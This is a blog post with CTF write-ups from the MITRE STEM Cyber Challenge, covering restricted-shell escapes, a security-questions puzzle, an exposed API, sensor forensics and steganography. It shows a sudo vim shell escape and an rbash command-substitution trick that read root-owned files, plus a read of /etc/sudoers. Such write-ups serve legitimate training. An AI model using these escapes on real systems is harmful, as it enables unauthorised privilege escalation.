Better late than never, I hope? A few weeks ago, I participated in the MITRE STEM Cyber Challenge CTF. My team placed 9th in the professional division, which was really cool.
January 8, 2014
All you need to do is read the flag!
So easy, ha! Okay, let’s get started.
$ ssh ctf@138.247.13.103
I originally thought that the date was a hint about the age of the file (since we can’t ls or use a number of other commands to search for it). I read about searching by date, and tried
touch --date "2010-01-05" /tmp/foo
To find the file location, but without much luck.
After reading some restricted shell guides, especially this one by Fireshell, I tried a number of things and continued without much luck. 😅
We are able to cat files, however. If we take a look at /etc/sudoers
$ cat /etc/sudoers
Towards the bottom of the file, we see:
ctf ALL=(root) NOPASSWD: /usr/bin/vim /home/ctf/*/*/HackMe2.txt
We could also have found this information by typing:
$ sudo -l
User ctf may run the following commands on 483daf0e3bde:
(root) NOPASSWD: /usr/bin/vim /home/ctf/*/*/HackMe2.txt
Okay, so we can run one command as sudo, and that’s
/usr/bin/vim /home/ctf/*/*/HackMe2.txt
We can use
:!/bin/sh
to execute commands from inside vim, so:
$ sudo /usr/bin/vim /home/ctf/*/*/HackMe2.txt
:!/bin/sh cat /root/flag.txt
The flag is MCA{ohghov1ieli7Eo2}.
Turing Test
This one wasn’t a technical challenge so much as a lesson in how insecure “security challenge” questions are.
Some of the MITRE participants complained about how this challenge wasn’t technical, but as shown in several Krebs blog posts, it is (sadly) a Real Thing That Happens. Ugly goals are still goals (or, based on your sport of preference, touch downs, etc).
The questions are:
- Mother’s Maiden Name (Stoney)
- First School Attended (St. Michael’s… the casing on this one took forever)
- Favorite Primary School Subject (Science)
- Favorite Olympic Event (Marathon)
- 2 + 2 – 3 = ? (1)
- Is it a leap year? (yes)
- I agree Security Questions are Bad (check)
Our flag is MCA{sms_2fa_is_bad_also}.
Or as one contestant put it:
TODO
TODO: remember where I put the flag
http://138.247.13.110/
This was a fun web challenge. If you navigate to the site, you see a very “Todoist” style landing page.
Is it a XSS challenge? No, sadly.
But if you open up Dev Tools and take a closer look at the code, you’ll notice that there’s a todoURL that’s part of the API used by the todolist app.
If we navigate to http://138.247.13.110/api/todos/ we can see a list of ALL the TODOs. There’s several hundred of them. 
We could write a script, or we could just control+F and search for MCA{.
Our flag is MCA{al3x4_5et_a_r3minder}.
Clean Room
This is another linux escape challenge.
The year is 30xx. Clyde is trapped in an interdimensional transport module. The Federation has captured the module and has prepared to dock. The captain of the Federation lander has instructed the henchmen to bring Clyde in to Federation custody. As a precaution they will place Clyde in a clean room to remove any radiation. Luckily, you’ve hacked into the lander’s mainframe. Help Clyde escape!
Once you ssh in:
ssh ctf@138.247.13.108
You’ll find that you’ve got a pretty restricted shell… you can’t use cd, ls and so on. I went through a number of restricted shell resources, including this one.
Since I spent so much time banging my head against the wall on the other Linux challenges, I got this one pretty quickly and thus, didn’t write extensive notes.
I guessed the location of flag.txt, and then directed the contents of that file to our rbash terminal (since we can’t use cat or anything like that). The backticks are command substitution.
ctf@492ec54ef83d:~$ `< /root/flag.txt`
-rbash: MCA{ieHaisoh4eif2ae}: command not found
Light at the End of the Tunnel
This was an interesting forensics challenge, and another one with a partial answer. I read some other writeups and felt that they didn’t answer the “graph values to PIN values” question, either.
The team has recovered the light sensor values from the target’s phone. We need you to use these values and identify the target’s 8-digit bank PIN. The target is a creature of habit so we’ve used that to our advantage. The sensor values are taken over a week during his commute on the subway. Same seat and roughly the same time so the conditions are good for your technique. There is good intelligence that the target typed in the PIN multiple times throughout the week during the commute. We also recovered the light sensor values from right before a phone call was made on the target’s phone, when the target was typing in a known phone number. However, these values were recorded under different lighting conditions than when the target was entering their 8-digit bank PIN. Note: The flag for this challenge is MCA{PIN}
In this challenge, you get a file file with a bunch of values. The first step is to remove the noise. If you open the file up in Excel or a similar program, and graph each set of numbers, you’ll see that there’s a bunch of noise, then a pattern, then more noise.
I also normalized each set (originally “taken under different lighting conditions”) to make it easier to see the patterns.
There’s another number set provided along with the PIN that is supposed to be a phone number. Another writeup that I read knew what number it mapped to but didn’t fully explain how. In any case, I missed that part entirely.
We know that the PIN is 8 chars long. In the above photo (and especially with the larger picture of “noise” on either side), we can say that the middle 8 points are the PIN.
Because the PIN numbers can range from 0 to 9, I set the graph lines to match the points, using the distance between the closest points (on the Y axis) as the step value.
Then, we can see that the graph points span 8 values. That could be 0-7, 1-8 or 2-9.
As a result, the PIN could be 47015407, 58126518 or 69236529. Again, if I had the phone number part sorted out, it wouldn’t be a guess, but the answer is MCA{58126518}
Nomination
Finally, a fun stego challenge and a reminder to always try StegSolve. 😉
Surprised Pikachu is old. Let’s get this surprised cat going.
We get an image of a cat:
strings doesn’t return anything interesting, but if we flip through a few layers in StegSolve, we can clearly see the flag:
The flag is MCA{g1jVx4a2zcpoZx2q}